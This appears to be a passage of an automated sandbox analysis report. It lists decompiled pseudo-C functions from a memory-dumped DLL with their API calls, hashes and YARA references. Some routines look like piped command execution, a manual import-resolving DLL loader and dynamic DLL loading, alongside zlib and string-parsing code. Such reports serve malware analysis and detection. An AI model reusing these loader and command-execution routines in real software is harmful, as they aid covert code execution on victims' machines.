				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

APIs

localeconv.MSVCRT ref: 10012207
strchr.MSVCRT ref: 1001221A
_errno.MSVCRT ref: 10012229
strtod.MSVCRT ref: 10012237
_errno.MSVCRT ref: 10012264

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x7900590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x7901bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x79007b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x79007b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

APIs

GetCurrentProcess.KERNEL32(?,?,07900590,?,10003545), ref: 1000CF90
GetModuleFileNameW.KERNEL32(00000000,07901BD4,00000105,?,?,07900590,?,10003545), ref: 1000CFB1
memset.MSVCRT ref: 1000CFE2
GetVersionExA.KERNEL32(07900590,07900590,?,10003545), ref: 1000CFED
GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x797faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x797faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x797faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x797faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x797faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x797faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x797fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x797faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x797faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}

APIs

memset.MSVCRT ref: 1000A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

D, xrefs: 1000AA4F

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
LoadLibraryA.KERNEL32(00000000), ref: 10012551

Strings

kernel32.dll, xrefs: 100124B3
GetProcAddress, xrefs: 100124C1

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x7900590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x7900590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x7900590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x7900590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x7900590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x797faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x797fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

APIs

LoadLibraryW.KERNEL32 ref: 1000C5C6
memset.MSVCRT ref: 1000C605

Strings

dll, xrefs: 1000C588
%08x, xrefs: 1000C52F

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724

Uniqueness

Uniqueness Score: -1.00%

Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

APIs

memcpy.MSVCRT ref: 10012E7D
memcpy.MSVCRT ref: 10012EF4
memcpy.MSVCRT ref: 10012F23
memcpy.MSVCRT ref: 10012F4F
memcpy.MSVCRT ref: 10013004

Part of subcall function 10015D90: memcpy.MSVCRT ref: 10015E6E

Part of subcall function 10014AF0: memcpy.MSVCRT ref: 10014B1A

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
